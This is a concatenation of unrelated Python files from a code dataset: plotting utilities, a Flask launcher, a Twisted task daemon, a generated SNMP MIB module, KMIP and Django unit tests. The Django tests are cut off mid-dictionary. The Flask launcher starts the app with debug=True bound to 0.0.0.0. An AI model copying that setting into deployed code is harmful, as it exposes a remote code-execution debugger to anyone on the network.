plottable = []
plot_names = []
dim_lim = 0 if not skip_1d else 1
for i, item in enumerate(w):
if item.ndim > dim_lim and item.shape[-1] > dim_lim:
plottable.append(item)
plot_names.append(names[i])
n = len(plottable)
if nrows is None or ncols is None:
ncols = math.ceil(math.sqrt(n))
nrows = math.ceil(n/ncols)
print("Plotting {} items\nUsing grid of size {} x {}".format(n, nrows, ncols))
fig, axes = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(ncols*3*1.5, nrows*2*1.5))
for r in range(nrows):
for c in range(ncols):
index = r*ncols+c
if index >= n:
if nrows == 1:
if ncols == 1:
axes.set_axis_off()
else:
axes[c].set_axis_off()
else:
axes[r][c].set_axis_off()
continue
data = plottable[index]
ndim = data.ndim
if ndim == 4:
data = data.reshape((np.prod(data.shape[:3]), data.shape[3]))
data = np.sort(data, axis=0)
title = plot_names[index]+" {}".format(data.shape)
title = '\n'.join(textwrap.wrap(title, wrapwidth))
if nrows == 1:
if ncols == 1:
axes.plot(data)
axes.set_title(title)
else:
axes[c].plot(data)
axes[c].set_title(title)
else:
axes[r][c].plot(data)
axes[r][c].set_title(title)
plt.tight_layout()
if path is None:
plt.show()
else:
plt.savefig(path, format='png')
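# Minimal usage sketch (the model construction is assumed, not part of this module):
#   model = tf.keras.Sequential([...])      # any Keras model with 2-D/4-D kernels
#   Profiler(model, skip_1d=True, path="weight_profiles.png")
# Each subplot shows the column-wise sorted values ("weight profile") of one
# trainable variable; 4-D convolution kernels are flattened to 2-D first.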
def PermutationTracer(A, B, figsize=(15, 15), arrow_alpha=1, max_rad=0.2, on_self=False,
diff_only=True, cmap=None):
""" Given 2 matrices A and B, where B can be obtained by permuting the entries of A
This method connects pixels of the same values between two matrixes.
Args:
arrow_alpha - (float) Transparency of arrows
max_rad - (float) Maximum arrow curvature
on_self - (boolean) - Whether show permutation on the left hand side image only.
diff_only - (boolean) - whether connects pixels that changed in locations.
"""
shapeA = A.shape
shapeB = B.shape
assert shapeA == shapeB, "A and B must have the same shapes."
A = A.ravel()
B = B.ravel()
ranker, locator, mapper = {}, {}, {}
argB = np.argsort(B)
rankB = np.argsort(argB)
for val, rank in zip(B, rankB):
ranker[val] = rank
for loc, arg in enumerate(argB):
locator[loc] = arg
for i in range(len(A)):
mapper[i] = locator[ranker[A[i]]]
A = A.reshape(shapeA)
B = B.reshape(shapeB)
# Plot
fig = plt.figure(figsize=figsize)
if not on_self:
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(224)
else:
ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
ax1.matshow(A, cmap=cmap)
ax2.matshow(B, cmap=cmap)
ax1.axis('off')
ax2.axis('off')
# Connect pixels
for i in range(shapeA[0]):
for j in range(shapeA[1]):
index = i*shapeA[1] + j
indexB = mapper[index]
if diff_only and index == indexB:
continue
xyA = (indexB % shapeA[1], indexB//shapeA[1])
xyB = (j, i)
axesA = ax2
axesB = ax1
if on_self:
axesB = ax1
axesA = ax1
con = ConnectionPatch(xyA=xyA, xyB=xyB,
coordsA="data", coordsB="data",
axesA=axesA, axesB=axesB,
color='turquoise' if np.random.randint(
2) else 'darkorange',
linewidth=2,
arrowstyle='<-',
connectionstyle="arc3,rad={}".format(
np.random.uniform(-max_rad, max_rad)),
alpha=arrow_alpha)
if on_self:
ax1.add_artist(con)
else:
ax2.add_artist(con)
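# Minimal usage sketch (arrays are illustrative; entries should be unique so the
# value-ranking logic above recovers the permutation unambiguously):
#   A = np.arange(16).reshape(4, 4)
#   B = A.ravel()[np.random.permutation(16)].reshape(4, 4)
#   PermutationTracer(A, B, figsize=(8, 8))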
| StarcoderdataPython |
1642393 | <filename>random-commander-app.py<gh_stars>0
from app import app
import os
if __name__ == '__main__':
port = os.getenv('VCAP_APP_PORT', '8080')
print('Running On Port: ' + str(port))
app.run(debug=True, host='0.0.0.0', port=port) | StarcoderdataPython |
1765774 | <reponame>sugarsack/sugar
# coding: utf-8
"""
Task processing daemon.
"""
import time
from twisted.internet import reactor, threads
from twisted.internet import task as twisted_task
import twisted.internet.error
from sugar.lib.compat import yaml
from sugar.lib.logger.manager import get_logger
from sugar.lib.compiler.objtask import FunctionObject
from sugar.lib.perq import QueueFactory
from sugar.lib.perq.qexc import QueueEmpty
from sugar.transport import RunnerModulesMsgFactory, ObjectGate
class TaskProcessor:
"""
Concurrent task processor.
"""
XLOG_PATH = "/var/cache/sugar/client/tasks"
XRET_PATH = "/var/cache/sugar/client/responses"
def __init__(self, loader):
self.t_counter = 0
self.log = get_logger(self)
self.loader = loader
self._queue = QueueFactory.fs_queue(self.XLOG_PATH).use_notify()
self._ret_queue = QueueFactory.fs_queue(self.XRET_PATH).use_notify()
self._d_stop = False
self._task_looper_marker = True
def on_task(self, task: FunctionObject) -> (str, dict):
"""
        Process a single task. This is either a task from the state sequence or a one-shot runner command.
        Runner URI must have a prefix "runner:" to it.
        :param task: FunctionObject
        :raises NotImplementedError: if a state task is called
        :return: tuple of (jid, response) containing the task result data
"""
# Todo: probably not FunctionObject, but StateTask *and* FunctionObject.
self.log.debug("Running task: {}. JID: {}", task, task.jid)
        # TODO: Send a message back confirming that the task was accepted
uri = "{}.{}".format(task.module, task.function)
task_source = {
"command": {
uri: []
}
}
if task.args:
task_source["command"][uri].append(task.args)
if task.kwargs:
task_source["command"][uri].append(task.kwargs)
if task.type == FunctionObject.TYPE_RUNNER:
response = RunnerModulesMsgFactory.create(jid=task.jid, task=task, src=yaml.dump(task_source))
try:
self.loader.runners[response.uri](*task.args, **task.kwargs).set_run_response(response)
except Exception as exc:
response.errmsg = "Error running task '{}.{}': {}".format(task.module, task.function, str(exc))
self.log.error(response.errmsg)
self._ret_queue.put_nowait(ObjectGate(response).pack(binary=True))
else:
raise NotImplementedError("State running is not implemented yet")
return task.jid, response
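    # Illustration (assumed values, not taken from the sugar test suite): a runner
    # task with module="system", function="ping" and args=["localhost"] yields
    #   task_source == {"command": {"system.ping": [["localhost"]]}}
    # which is the same one-shot structure that gets serialised to YAML as 'src'.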
def on_task_result(self, result: tuple) -> None:
"""
Store task results to the returner facility.
:param result: Resulting data from the performed task, which is a tuple of "(jid, result)".
:return: None
"""
jid, response = result
self.log.debug("Task return: {}. JID: {}", response.return_data, jid)
# Decrease tasks counter
if self.t_counter:
self.t_counter -= 1
# [Re]fire deferred stop.
# This will occur only if deferred_stop() has been once fired
# from the outside. Otherwise this process will keep running.
if self._d_stop:
self.deferred_stop()
def deferred_stop(self) -> None:
"""
Fire worker's deferred stop, which will stop
this process only after all tasks are finished.
:return: None
"""
if not self._d_stop:
self._d_stop = True
if not self.t_counter:
self.log.info("Task processor shut down")
try:
reactor.stop()
except twisted.internet.error.ReactorNotRunning:
self.log.debug("Reactor is no longer running")
def next_task(self) -> None:
"""
Cycle the next task.
:return: None
"""
task = None
while task is None:
try:
task = self._queue.get(force=self._task_looper_marker) # If any old lock still there
self._task_looper_marker = False
except QueueEmpty:
self.log.debug("Skipping concurrent notification: task already taken")
time.sleep(1)
self.log.info("Processing task")
threads.deferToThread(self.on_task, task).addCallback(self.on_task_result)
self.t_counter += 1
while True:
try:
task = self._queue.get_nowait()
threads.deferToThread(self.on_task, task).addCallback(self.on_task_result)
self.t_counter += 1
except QueueEmpty:
self.log.debug("No more tasks")
break
def schedule_task(self, task) -> None:
"""
Schedule task.
:param task: Task to schedule
:return: None
"""
self._queue.put(task)
def get_response(self, force: bool):
"""
Get response.
        :param force: force the first get (removes a stale disk lock)
:return: A response payload
"""
return self._ret_queue.get_nowait(force=force) if not self._ret_queue.pending() else None
def run(self) -> None:
"""
Run task processor.
:return: None
"""
self.log.info("Task processor start")
twisted_task.LoopingCall(self.next_task).start(0.1)
reactor.run()
self.log.info("Processor stopped")
| StarcoderdataPython |
3320542 | # Tensorboard writer
import os
import torch
import numpy as np
from tensorboardX import SummaryWriter
class TensorboardWriter():
''' Tensorboard Writer '''
def __init__(self, log_dir=None):
self.log_dir = log_dir
self.writer = SummaryWriter(log_dir=log_dir)
def write(self, result, n_iter):
for metric in result:
self.writer.add_scalar(metric, result[metric], n_iter)
def export(self):
json_path = os.path.join(self.log_dir, 'results.json')
self.writer.export_scalars_to_json(json_path)
def close(self):
self.writer.close()
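# Minimal usage sketch (log_dir and metric names are placeholders):
#   writer = TensorboardWriter(log_dir="runs/exp1")
#   writer.write({"loss": 0.42, "accuracy": 0.91}, n_iter=100)
#   writer.export()   # dumps runs/exp1/results.json
#   writer.close()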
| StarcoderdataPython |
102364 | <filename>src/open_sea/__init__.py
from .open_sea import OpenSea | StarcoderdataPython |
36156 | <filename>pysnmp/ALVARION-SMI.py
#
# PySNMP MIB module ALVARION-SMI (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ALVARION-SMI
# Produced by pysmi-0.3.4 at Mon Apr 29 17:06:07 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
IpAddress, Unsigned32, ObjectIdentity, TimeTicks, MibIdentifier, Integer32, ModuleIdentity, Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Gauge32, NotificationType, Counter32, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Unsigned32", "ObjectIdentity", "TimeTicks", "MibIdentifier", "Integer32", "ModuleIdentity", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "Gauge32", "NotificationType", "Counter32", "Counter64", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
alvarionWireless = ModuleIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10))
if mibBuilder.loadTexts: alvarionWireless.setLastUpdated('200710310000Z')
if mibBuilder.loadTexts: alvarionWireless.setOrganization('Alvarion Ltd.')
alvarionProducts = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 1))
if mibBuilder.loadTexts: alvarionProducts.setStatus('current')
alvarionExperiment = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 3))
if mibBuilder.loadTexts: alvarionExperiment.setStatus('current')
alvarionModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 4))
if mibBuilder.loadTexts: alvarionModules.setStatus('current')
alvarionMgmtV2 = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 5))
if mibBuilder.loadTexts: alvarionMgmtV2.setStatus('current')
variation = ObjectIdentity((1, 3, 6, 1, 4, 1, 12394, 1, 10, 7))
if mibBuilder.loadTexts: variation.setStatus('current')
mibBuilder.exportSymbols("ALVARION-SMI", variation=variation, PYSNMP_MODULE_ID=alvarionWireless, alvarionProducts=alvarionProducts, alvarionWireless=alvarionWireless, alvarionModules=alvarionModules, alvarionMgmtV2=alvarionMgmtV2, alvarionExperiment=alvarionExperiment)
| StarcoderdataPython |
1622578 | #-*- coding:utf-8 -*-
__version__ = '0.1.0'
__author__ = '<NAME>, <NAME> 20.03.2019'
__status__ = 'dev' # options are: dev, test, prod
from ioproc.tools import action
from ioproc.logger import mainlogger
@action('general')
def printData(dmgr, config, params):
'''
simple debugging printing function. Prints all data in the data manager.
Does not have any parameters.
'''
for k, v in dmgr.items():
mainlogger.info(k+' = \n'+str(v))
@action('general')
def checkpoint(dmgr, config, params):
'''
Creates a checkpoint file in the current working directory with name
Cache_TAG while TAG is supplied by the action config.
:param tag: the tag for this checkpoint, this can never be "start"
'''
assert params['tag'] != 'start', 'checkpoints can not be named start'
dmgr.toCache(params['tag'])
mainlogger.info('set checkpoint "{}"'.format(params['tag']))
| StarcoderdataPython |
1705349 | # Copyright (c) 2015 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from kmip.core import attributes
from kmip.core import exceptions
from kmip.core import utils
class TestApplicationSpecificInformation(testtools.TestCase):
"""
A test suite for the ApplicationSpecificInformation class.
"""
def setUp(self):
super(TestApplicationSpecificInformation, self).setUp()
# This encoding was taken from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Namespace - ssl
# Application Data - www.example.com
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x28'
b'\x42\x00\x03\x07\x00\x00\x00\x03\x73\x73\x6C\x00\x00\x00\x00\x00'
b'\x42\x00\x02\x07\x00\x00\x00\x0F'
b'\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C\x65\x2E\x63\x6F\x6D\x00'
)
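        # TTLV breakdown of the encoding above (added for readability; tag names
        # follow the KMIP 1.1 specification):
        #   42 00 04 | 01 | 00 00 00 28 -> ApplicationSpecificInformation, Structure, 40 bytes
        #   42 00 03 | 07 | 00 00 00 03 -> ApplicationNamespace, TextString, "ssl" (padded to 8)
        #   42 00 02 | 07 | 00 00 00 0F -> ApplicationData, TextString, "www.example.com" (padded to 16)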
# This encoding was adapted from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Data - www.example.com
self.no_application_namespace_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x18'
b'\x42\x00\x02\x07\x00\x00\x00\x0F'
b'\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C\x65\x2E\x63\x6F\x6D\x00'
)
# This encoding was adapted from test case 3.1.2 from the KMIP 1.1 test
# document.
#
# This encoding matches the following set of values:
# Application Specific Information
# Application Namespace - ssl
self.no_application_data_encoding = utils.BytearrayStream(
b'\x42\x00\x04\x01\x00\x00\x00\x10'
b'\x42\x00\x03\x07\x00\x00\x00\x03\x73\x73\x6C\x00\x00\x00\x00\x00'
)
def tearDown(self):
super(TestApplicationSpecificInformation, self).tearDown()
def test_init(self):
"""
Test that an ApplicationSpecificInformation object can be constructed.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
self.assertIsNone(app_specific_info.application_data)
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="namespace",
application_data="data"
)
self.assertEqual("namespace", app_specific_info.application_namespace)
self.assertEqual("data", app_specific_info.application_data)
def test_invalid_application_namespace(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the application namespace of an ApplicationSpecificInformation object.
"""
kwargs = {"application_namespace": []}
self.assertRaisesRegex(
TypeError,
"The application namespace must be a string.",
attributes.ApplicationSpecificInformation,
**kwargs
)
args = (
attributes.ApplicationSpecificInformation(),
"application_namespace",
[]
)
self.assertRaisesRegex(
TypeError,
"The application namespace must be a string.",
setattr,
*args
)
def test_invalid_application_data(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the application data of an ApplicationSpecificInformation object.
"""
kwargs = {"application_data": []}
self.assertRaisesRegex(
TypeError,
"The application data must be a string.",
attributes.ApplicationSpecificInformation,
**kwargs
)
args = (
attributes.ApplicationSpecificInformation(),
"application_data",
[]
)
self.assertRaisesRegex(
TypeError,
"The application data must be a string.",
setattr,
*args
)
def test_read(self):
"""
Test that an ApplicationSpecificInformation object can be read from a
buffer.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
self.assertIsNone(app_specific_info.application_data)
app_specific_info.read(self.full_encoding)
self.assertEqual("ssl", app_specific_info.application_namespace)
self.assertEqual("www.example.com", app_specific_info.application_data)
def test_read_missing_application_namespace(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding of
        an ApplicationSpecificInformation object when the application namespace
        is missing from the encoding.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_namespace)
args = (self.no_application_namespace_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The ApplicationSpecificInformation encoding is missing the "
"ApplicationNamespace field.",
app_specific_info.read,
*args
)
def test_read_missing_application_data(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding of
        an ApplicationSpecificInformation object when the application data is
        missing from the encoding.
"""
app_specific_info = attributes.ApplicationSpecificInformation()
self.assertIsNone(app_specific_info.application_data)
args = (self.no_application_data_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The ApplicationSpecificInformation encoding is missing the "
"ApplicationData field.",
app_specific_info.read,
*args
)
def test_write(self):
"""
Test that an ApplicationSpecificInformation object can be written to a
buffer.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
buff = utils.BytearrayStream()
app_specific_info.write(buff)
self.assertEqual(len(self.full_encoding), len(buff))
self.assertEqual(str(self.full_encoding), str(buff))
def test_write_missing_application_namespace(self):
"""
Test that an InvalidField error is raised during the encoding of an
ApplicationSpecificInformation object when the object is missing the
application namespace field.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_data="www.example.com"
)
buff = utils.BytearrayStream()
args = (buff, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The ApplicationSpecificInformation object is missing the "
"ApplicationNamespace field.",
app_specific_info.write,
*args
)
def test_write_missing_application_data(self):
"""
Test that an InvalidField error is raised during the encoding of an
ApplicationSpecificInformation object when the object is missing the
application data field.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl"
)
buff = utils.BytearrayStream()
args = (buff, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The ApplicationSpecificInformation object is missing the "
"ApplicationData field.",
app_specific_info.write,
*args
)
def test_repr(self):
"""
Test that repr can be applied to an ApplicationSpecificInformation
object.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
args = [
"application_namespace='ssl'",
"application_data='www.example.com'"
]
self.assertEqual(
"ApplicationSpecificInformation({})".format(", ".join(args)),
repr(app_specific_info)
)
def test_str(self):
"""
Test that str can be applied to an ApplicationSpecificInformation
object.
"""
app_specific_info = attributes.ApplicationSpecificInformation(
application_namespace="ssl",
application_data="www.example.com"
)
args = [
("application_namespace", "ssl"),
("application_data", "www.example.com")
]
value = "{}".format(
", ".join(['"{}": "{}"'.format(arg[0], arg[1]) for arg in args])
)
self.assertEqual(
"{" + value + "}",
str(app_specific_info)
)
def test_comparison(self):
"""
Test that the equality/inequality operators return True/False when
comparing two ApplicationSpecificInformation objects with the same
data.
"""
a = attributes.ApplicationSpecificInformation()
b = attributes.ApplicationSpecificInformation()
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
b = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_comparison_on_different_application_namespaces(self):
"""
Test that the equality/inequality operators return False/True when
comparing two ApplicationSpecificInformation objects with different
data.
"""
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace_1"
)
b = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace_2"
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_different_application_data(self):
"""
Test that the equality/inequality operators return False/True when
comparing two ApplicationSpecificInformation objects with different
data.
"""
a = attributes.ApplicationSpecificInformation(
application_data="test_data_1"
)
b = attributes.ApplicationSpecificInformation(
application_data="test_data_2"
)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_comparison_on_type_mismatch(self):
"""
Test that the equality/inequality operators return False/True when
comparing an ApplicationSpecificInformation object to a
non-ApplicationSpecificInformation object.
"""
a = attributes.ApplicationSpecificInformation(
application_namespace="test_namespace",
application_data="test_data"
)
b = "invalid"
self.assertFalse(a == b)
self.assertFalse(b == a)
| StarcoderdataPython |
3252688 | """Remember umbrella
Use :py:mod:`requests` to scrape data from http://weather.gov/.
Write a program that runs just before you wake up in the morning and checks
whether it’s raining that day. If so, have the program text you a reminder to pack
an umbrella before leaving the house.
"""
import requests, bs4, datetime
def get_weather(url_arg: str) -> str:
"""Get weather
Uses :py:mod:`requests` to download given weather page url, then uses :py:mod:`bs4` to get
the current weather data text.
Args:
url_arg: String containing url to specified city's http://weather.gov/ weather page.
Returns:
String with current weather data text.
"""
# Download url_arg and soupify
res = requests.get(url_arg)
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, 'lxml')
# Parse current weather from soup
weather_element = soup.select('.myforecast-current')
return weather_element[0].getText()
def remember_umbrella(weather_arg: str) -> bool:
"""Remember umbrella
Checks current weather data text from :meth:`get_weather` for keywords indicating rain.
Args:
weather_arg: String containing current weather text of specified city.
Returns:
True if any of the rain keywords are found, False otherwise.
"""
# Check weather_arg for rain
tokens = ['rain', 't-storms']
"""list: Strings of keywords that indicate rain."""
weather_arg = weather_arg.lower() # To match tokens' case
for token in tokens:
if token in weather_arg:
return True
return False
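# A couple of illustrative calls (weather strings are made up, not scraped):
#   remember_umbrella('Chance T-Storms') -> True   (matches the 't-storms' keyword)
#   remember_umbrella('Sunny')           -> False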
def check_time(time_arg: datetime.time) -> bool:
"""Check time
Checks if given time is after current time as given by :meth:`datetime.datetime.now`.
Args:
time_arg: :class:`datetime.time` object to compare with current time.
Returns:
True if given time is after current time.
"""
# Check for time_arg
time_now = datetime.datetime.now().time()
if time_now < time_arg:
print(f'RuntimeError: can\'t run until {time_arg}')
return False
return True
def main():
import time
from books.AutomateTheBoringStuff.Ch16.P5_textMyself import textmyself
# Wait for wake_time
sleep_time = datetime.timedelta(minutes=5)
wake_time = datetime.time(hour=5)
while not check_time(wake_time):
time.sleep(sleep_time.total_seconds())
# Get current weather
url = 'https://forecast.weather.gov/MapClick.php?lat=30.26759000000004&lon=-97.74298999999996'
weather = get_weather(url)
# If raining, text cellphone
if remember_umbrella(weather):
message = f'Bring an umbrella, there\'s {weather.lower()}'
textmyself(message)
# If run directly (instead of imported), run main()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3331179 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import json
from django.test import (Client,
TestCase,
LiveServerTestCase)
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.contrib.gis.geos import GEOSGeometry
from apps.geoprocessing_api import (tasks, calcs)
class ExerciseManageApiToken(LiveServerTestCase):
TOKEN_URL = 'http://localhost:8081/api/token/'
def setUp(self):
User.objects.create_user(username='bob', email='<EMAIL>',
password='<PASSWORD>')
User.objects.create_user(username='nono', email='<EMAIL>',
password='<PASSWORD>')
def get_logged_in_session(self, username, password):
c = Client()
c.login(username=username,
password=password)
return c
def get_api_token(self, username='', password='',
session=None, regenerate=False):
if not session:
session = Client()
payload = {}
if username or password:
payload.update({'username': username,
'password': password})
if regenerate:
payload.update({'regenerate': True})
return session.post(self.TOKEN_URL,
data=payload)
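    # The helper above covers the three calling styles exercised below: anonymous
    # (no credentials), credentials in the request body, and an already
    # authenticated session, plus an optional 'regenerate' flag to rotate the token.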
    def test_get_api_token_no_credentials_returns_403(self):
response = self.get_api_token()
self.assertEqual(response.status_code, 403,
'Incorrect server response. Expected 403 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_bad_body_credentials_returns_400(self):
response = self.get_api_token('bad', 'bad')
self.assertEqual(response.status_code, 400,
'Incorrect server response. Expected 400 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_good_body_credentials_returns_200(self):
response = self.get_api_token('bob', '<PASSWORD>')
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_good_session_credentials_returns_200(self):
s = self.get_logged_in_session('bob', 'bob')
response = self.get_api_token(session=s)
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
def test_get_api_token_uses_body_credentials_over_session(self):
bob_user = User.objects.get(username='bob')
bob_token = Token.objects.get(user=bob_user)
s = self.get_logged_in_session('nono', 'nono')
response = self.get_api_token('bob', 'bob', s)
self.assertEqual(response.status_code, 200,
'Incorrect server response. Expected 200 found %s %s'
% (response.status_code, response.content))
response_token = json.loads(response.content)['token']
self.assertEqual(str(response_token), str(bob_token),
""" Incorrect server response.
Expected to get token for user
given in request body %s, but got %s
""" % (bob_token, response_token))
def test_get_api_token_doesnt_regenerate_token(self):
bob_user = User.objects.get(username='bob')
bob_token_before = Token.objects.get(user=bob_user)
response = self.get_api_token('bob', 'bob')
response_token = json.loads(response.content)['token']
self.assertEqual(str(response_token), str(bob_token_before),
""" Expected request token to be the same
as token before the request was made
(%s), but got %s
""" % (bob_token_before, response_token))
bob_token_after = Token.objects.get(user=bob_user)
self.assertEqual(bob_token_before, bob_token_after,
""" Expected token to be the same
as it was before the request was made
(%s), but got %s
""" % (bob_token_before, bob_token_after))
def test_get_api_token_can_regenerate_token(self):
bob_user = User.objects.get(username='bob')
old_bob_token = Token.objects.get(user=bob_user)
response = self.get_api_token('bob', 'bob', regenerate=True)
response_token = json.loads(response.content)['token']
new_bob_token = Token.objects.get(user=bob_user)
self.assertEqual(str(response_token), str(new_bob_token),
""" Expected regenerated response token to
be the same as stored token (%s), but got %s
""" % (new_bob_token, response_token))
self.assertTrue(old_bob_token is not new_bob_token,
""" Expected new token to be created
but token is the same""")
class ExerciseAnalyze(TestCase):
def test_survey_land(self):
self.maxDiff = None
# NLCD Histogram of Little Neshaminy HUC-12
histogram = {
'List(11)': 39,
'List(21)': 40558,
'List(22)': 25230,
'List(23)': 10976,
'List(24)': 3793,
'List(31)': 364,
'List(41)': 19218,
'List(42)': 153,
'List(43)': 329,
'List(52)': 3309,
'List(71)': 684,
'List(81)': 8922,
'List(82)': 6345,
'List(90)': 3940,
'List(95)': 112,
}
expected = {
"survey": {
"displayName": "Land",
"name": "land",
"categories": [
{
"area": 329,
"code": "mixed_forest",
"coverage": 0.002653825057270997,
"nlcd": 43,
"type": "Mixed Forest"
},
{
"area": 684,
"code": "grassland",
"coverage": 0.005517374891104443,
"nlcd": 71,
"type": "Grassland/Herbaceous"
},
{
"area": 19218,
"code": "deciduous_forest",
"coverage": 0.1550188752298906,
"nlcd": 41,
"type": "Deciduous Forest"
},
{
"area": 153,
"code": "evergreen_forest",
"coverage": 0.001234149646694415,
"nlcd": 42,
"type": "Evergreen Forest"
},
{
"area": 39,
"code": "open_water",
"coverage": 0.00031458716484367437,
"nlcd": 11,
"type": "Open Water"
},
{
"area": 0,
"code": "perennial_ice",
"coverage": 0,
"nlcd": 12,
"type": "Perennial Ice/Snow"
},
{
"area": 8922,
"code": "pasture",
"coverage": 0.07196786371116058,
"nlcd": 81,
"type": "Pasture/Hay"
},
{
"area": 6345,
"code": "cultivated_crops",
"coverage": 0.051180911818797796,
"nlcd": 82,
"type": "Cultivated Crops"
},
{
"area": 3309,
"code": "shrub",
"coverage": 0.026691510986351755,
"nlcd": 52,
"type": "Shrub/Scrub"
},
{
"area": 40558,
"code": "developed_open",
"coverage": 0.32715451876230117,
"nlcd": 21,
"type": "Developed, Open Space"
},
{
"area": 25230,
"code": "developed_low",
"coverage": 0.20351369664117705,
"nlcd": 22,
"type": "Developed, Low Intensity"
},
{
"area": 10976,
"code": "developed_med",
"coverage": 0.0885361210595941,
"nlcd": 23,
"type": "Developed, Medium Intensity"
},
{
"area": 3793,
"code": "developed_high",
"coverage": 0.030595618365437355,
"nlcd": 24,
"type": "Developed, High Intensity"
},
{
"area": 3940,
"code": "woody_wetlands",
"coverage": 0.0317813699867712,
"nlcd": 90,
"type": "Woody Wetlands"
},
{
"area": 112,
"code": "herbaceous_wetlands",
"coverage": 0.000903429806730552,
"nlcd": 95,
"type": "Emergent Herbaceous Wetlands"
},
{
"area": 364,
"code": "barren_land",
"coverage": 0.0029361468718742943,
"nlcd": 31,
"type": "Barren Land (Rock/Sand/Clay)"
}
]
}
}
actual = tasks.analyze_nlcd(histogram)
self.assertEqual(actual, expected)
def test_survey_soil(self):
self.maxDiff = None
# Soil histogram of Little Neshaminy HUC-12
histogram = {
'List(-2147483648)': 47430,
'List(1)': 2905,
'List(2)': 14165,
'List(3)': 23288,
'List(4)': 23109,
'List(6)': 338,
'List(7)': 12737,
}
expected = {
"survey": {
"displayName": "Soil",
"name": "soil",
"categories": [
{
"area": 2905,
"code": "a",
"coverage": 0.023432710612073693,
"type": "A - High Infiltration"
},
{
"area": 14165,
"code": "b",
"coverage": 0.11425967153873455,
"type": "B - Moderate Infiltration"
},
{
"area": 70718,
"code": "c",
"coverage": 0.5704352595747427,
"type": "C - Slow Infiltration"
},
{
"area": 23109,
"code": "d",
"coverage": 0.1864049946762172,
"type": "D - Very Slow Infiltration"
},
{
"area": 0,
"code": "ad",
"coverage": 0,
